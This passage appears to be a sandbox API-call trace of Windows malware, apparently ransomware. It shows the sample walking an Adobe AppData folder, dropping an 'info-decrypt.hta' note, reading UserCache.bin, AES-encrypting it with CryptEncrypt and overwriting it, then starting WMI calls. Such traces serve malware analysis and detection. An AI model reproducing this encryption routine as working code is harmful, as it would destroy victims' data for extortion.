nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.127] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0149.127] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.128] FindClose (in: hFindFile=0xb7f750 | out: hFindFile=0xb7f750) returned 1 [0149.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec3c) returned 1 [0149.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec48) returned 1 [0149.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec2c) returned 1 [0149.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x949e734, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x3e [0149.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\", nBufferLength=0x105, lpBuffer=0x949e708, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\", lpFilePart=0x0) returned 0x3f [0149.128] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x949e954 | out: lpFindFileData=0x949e954*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f750 [0149.129] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.129] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe952fcd0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x892c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCMapFnt10.lst", cAlternateFileName="ADOBEC~1.LST")) returned 1 [0149.129] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xd9c071a0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x21cdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeSysFnt10.lst", cAlternateFileName="ADOBES~1.LST")) returned 1 [0149.129] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xecb5bdd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0149.129] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd3b286a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd3b286a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xee0c3750, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharedDataEvents", cAlternateFileName="SHARED~1")) returned 1 [0149.130] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd243f2e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd243f2e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe99341f0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x12ea5, dwReserved0=0x0, dwReserved1=0x0, cFileName="UserCache.bin", cAlternateFileName="USERCA~1.BIN")) returned 1 [0149.130] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.130] FindClose (in: hFindFile=0xb7f750 | out: hFindFile=0xb7f750) returned 1 [0149.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebec) returned 1 [0149.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebf8) returned 1 [0149.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec2c) returned 1 [0149.131] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x949e734, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x3e [0149.131] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\", nBufferLength=0x105, lpBuffer=0x949e708, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\", lpFilePart=0x0) returned 0x3f [0149.131] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x949e954 | out: lpFindFileData=0x949e954*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f750 [0149.132] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.132] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe952fcd0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x892c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCMapFnt10.lst", cAlternateFileName="ADOBEC~1.LST")) returned 1 [0149.132] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xd9c071a0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x21cdb, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeSysFnt10.lst", cAlternateFileName="ADOBES~1.LST")) returned 1 [0149.132] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xecb5bdd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0149.132] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd3b286a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd3b286a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xee0c3750, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharedDataEvents", cAlternateFileName="SHARED~1")) returned 1 [0149.132] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd243f2e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd243f2e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe99341f0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x12ea5, dwReserved0=0x0, dwReserved1=0x0, cFileName="UserCache.bin", cAlternateFileName="USERCA~1.BIN")) returned 1 [0149.133] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd243f2e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd243f2e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe99341f0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x12ea5, dwReserved0=0x0, dwReserved1=0x0, cFileName="UserCache.bin", cAlternateFileName="USERCA~1.BIN")) returned 0 [0149.133] FindClose (in: hFindFile=0xb7f750 | out: hFindFile=0xb7f750) returned 1 [0149.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebec) returned 1 [0149.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebf8) returned 1 [0149.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", nBufferLength=0x105, lpBuffer=0x949e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", lpFilePart=0x0) returned 0x4c [0149.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e6a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0149.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb08) returned 1 [0149.134] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949eb84 | out: lpFileInformation=0x949eb84*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb04) returned 1 [0149.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", nBufferLength=0x105, lpBuffer=0x949e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", lpFilePart=0x0) returned 0x4c [0149.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e548, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0149.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea3c) returned 1 [0149.135] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0149.135] GetFileType (hFile=0x31c) returned 0x1 [0149.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea38) returned 1 [0149.135] GetFileType (hFile=0x31c) returned 0x1 [0149.136] WriteFile (in: hFile=0x31c, lpBuffer=0x37a7108*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949eb00, lpOverlapped=0x0 | out: lpBuffer=0x37a7108*, lpNumberOfBytesWritten=0x949eb00*=0x1000, lpOverlapped=0x0) returned 1 [0149.136] WriteFile (in: hFile=0x31c, lpBuffer=0x37a7108*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949ead4, lpOverlapped=0x0 | out: lpBuffer=0x37a7108*, lpNumberOfBytesWritten=0x949ead4*=0x55e, lpOverlapped=0x0) returned 1 [0149.137] CloseHandle (hObject=0x31c) returned 1 [0149.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", nBufferLength=0x105, lpBuffer=0x949e6a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", lpFilePart=0x0) returned 0x4c [0149.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb54) returned 1 [0149.137] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), fInfoLevelId=0x0, lpFileInformation=0x37a8124 | out: lpFileInformation=0x37a8124*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd243f2e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd243f2e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe99341f0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x12ea5)) returned 1 [0149.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb50) returned 1 [0149.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", nBufferLength=0x105, lpBuffer=0x949e594, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", lpFilePart=0x0) returned 0x4c [0149.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea88) returned 1 [0149.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0149.138] GetFileType (hFile=0x31c) returned 0x1 [0149.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea84) returned 1 [0149.138] GetFileType (hFile=0x31c) returned 0x1 [0149.138] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x949eb90 | out: lpFileSizeHigh=0x949eb90*=0x0) returned 0x12ea5 [0149.138] ReadFile (in: hFile=0x31c, lpBuffer=0x37a8354, nNumberOfBytesToRead=0x12ea5, lpNumberOfBytesRead=0x949eb3c, lpOverlapped=0x0 | out: lpBuffer=0x37a8354*, lpNumberOfBytesRead=0x949eb3c*=0x12ea5, lpOverlapped=0x0) returned 1 [0149.140] CloseHandle (hObject=0x31c) returned 1 [0149.140] CryptAcquireContextW (in: phProv=0x949eadc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949eadc*=0xbdf948) returned 1 [0149.141] CryptGenRandom (in: hProv=0xbdf948, dwLen=0x10, pbBuffer=0x37bb550 | out: pbBuffer=0x37bb550) returned 1 [0150.247] CryptImportKey (in: hProv=0xbdf948, pbData=0x3901390, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949eaac | out: phKey=0x949eaac*=0xb7f490) returned 1 [0150.247] CryptContextAddRef (hProv=0xbdf948, pdwReserved=0x0, dwFlags=0x0) returned 1 [0150.247] CryptContextAddRef (hProv=0xbdf948, pdwReserved=0x0, dwFlags=0x0) returned 1 [0150.247] CryptDuplicateKey (in: hKey=0xb7f490, pdwReserved=0x0, dwFlags=0x0, phKey=0x949ea9c | out: phKey=0x949ea9c*=0xb7f850) returned 1 [0150.247] CryptContextAddRef (hProv=0xbdf948, pdwReserved=0x0, dwFlags=0x0) returned 1 [0150.247] CryptSetKeyParam (hKey=0xb7f850, dwParam=0x4, pbData=0x3901470*=0x1, dwFlags=0x0) returned 1 [0150.247] CryptSetKeyParam (hKey=0xb7f850, dwParam=0x1, pbData=0x390143c, dwFlags=0x0) returned 1 [0150.248] CryptEncrypt (in: hKey=0xb7f850, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3901480*, pdwDataLen=0x949eb08*=0x12eb0, dwBufLen=0x12eb0 | out: pbData=0x3901480*, pdwDataLen=0x949eb08*=0x12eb0) returned 1 [0150.249] CryptEncrypt (in: hKey=0xb7f850, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3914354*, pdwDataLen=0x949eb10*=0x0, dwBufLen=0x10 | out: pbData=0x3914354*, pdwDataLen=0x949eb10*=0x10) returned 1 [0150.250] CryptDestroyKey (hKey=0xb7f490) returned 1 [0150.250] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0150.250] CryptReleaseContext (hProv=0xbdf948, dwFlags=0x0) returned 1 [0150.250] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", nBufferLength=0x105, lpBuffer=0x949e580, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", lpFilePart=0x0) returned 0x4c [0150.250] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea74) returned 1 [0150.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0150.251] GetFileType (hFile=0x31c) returned 0x1 [0150.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea70) returned 1 [0150.251] GetFileType (hFile=0x31c) returned 0x1 [0150.252] WriteFile (in: hFile=0x31c, lpBuffer=0x3914988*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949eb04, lpOverlapped=0x0 | out: lpBuffer=0x3914988*, lpNumberOfBytesWritten=0x949eb04*=0x20, lpOverlapped=0x0) returned 1 [0150.253] CloseHandle (hObject=0x31c) returned 1 [0150.254] CoTaskMemAlloc (cb=0x20c) returned 0x66d3d80 [0150.254] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66d3d80 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0150.254] CoTaskMemFree (pv=0x66d3d80) [0150.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e568, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0150.254] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949eab0 | out: ppv=0x949eab0*=0xb51e34) returned 0x0 [0150.254] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949eaa8 | out: pAptType=0x949eaa8*=1) returned 0x0 [0150.254] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949eaac | out: ppvObject=0x949eaac*=0x0) returned 0x80004002 [0150.254] IUnknown:Release (This=0xb51e34) returned 0x1 [0150.256] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e418 | out: ppv=0x949e418*=0x60249c0) returned 0x0 [0150.256] WbemDefPath:IUnknown:QueryInterface (in: This=0x60249c0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e630 | out: ppvObject=0x949e630*=0x0) returned 0x80004002 [0150.256] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60249c0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e644 | out: ppvObject=0x949e644*=0x6025370) returned 0x0 [0150.256] WbemDefPath:IUnknown:Release (This=0x60249c0) returned 0x0 [0150.256] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025370, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e264 | out: ppvObject=0x949e264*=0x6025370) returned 0x0 [0150.256] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025370, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e220 | out: ppvObject=0x949e220*=0x0) returned 0x80004002 [0150.256] WbemDefPath:IUnknown:AddRef (This=0x6025370) returned 0x3 [0150.256] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025370, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949db7c | out: ppvObject=0x949db7c*=0x0) returned 0x80004002 [0150.256] WbemDefPath:IUnknown:QueryInterface (in: This=0x6025370, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949db2c | out: ppvObject=0x949db2c*=0x0) returned 0x80004002 [0150.256] 